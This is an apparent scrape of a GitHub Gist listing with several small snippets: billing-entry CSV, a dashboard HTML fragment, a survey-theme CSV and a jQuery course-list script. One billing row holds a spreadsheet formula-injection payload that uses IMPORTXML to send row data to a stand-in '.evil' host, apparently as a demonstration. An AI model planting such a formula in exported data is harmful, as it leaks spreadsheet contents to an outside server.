Skip to content

Instantly share code, notes, and snippets.

UserId BillToDate ProjectName Description DurationMinutes
1 2017-07-25 Test Project Flipped the jibbet 60
2 2017-07-25 Important Client Bop, dop, and giglip 240
2 2017-07-25 Important Client =IMPORTXML(CONCAT("http://some-server-with-log.evil?v=", CONCATENATE(A2:E2)),"//a") 240
@davetaz
davetaz / index.html
Created November 17, 2015 10:19
zvyLrx
<section id="main">
<h2>Company Status</h2>
<div id="status_pie"></div>
<br/>
<h2 id="timetitle">Expenses per day</h2>
<div id="timeline"></div>
<br/>
<h2>Raw data</h2>
<table id="dc-data-table" class="table table-hover"></table>
</section>
@davetaz
davetaz / data.csv
Last active August 29, 2015 14:20 — forked from mbostock/.block
Theme Q1 Q2 Q3 Q4 Q5 Q6 Q7
Process 3 2 4 5 1 2 3
Knowledge 2 5 3 4 2 1 3
Engagement 2 3 1 1 1 2 1
Investment 3 2 1 4 5 1 2
Goverance 2 3 2 3 4 4 2
@davetaz
davetaz / README.md
Last active August 29, 2015 14:17 — forked from weiglemc/.block
@davetaz
davetaz / gist:17936c64aaccb746dd4a
Created November 19, 2014 14:57
ODI courses test
<ul id="courses"></ul>
<script src="http://code.jquery.com/jquery-1.11.1.min.js"></script>
<script type="text/javascript">
$( document ).ready(function() {
$.getJSON( "http://theodi.org/courses.json?callback=?", function( data ) {
courses = data.results;
for (i=0;i<courses.length;i++) {
course = courses[i];
console.log(course["title"]);
}
@davetaz
davetaz / README.md
Last active August 28, 2020 11:36
D3 Treemap from CSV with d3.nest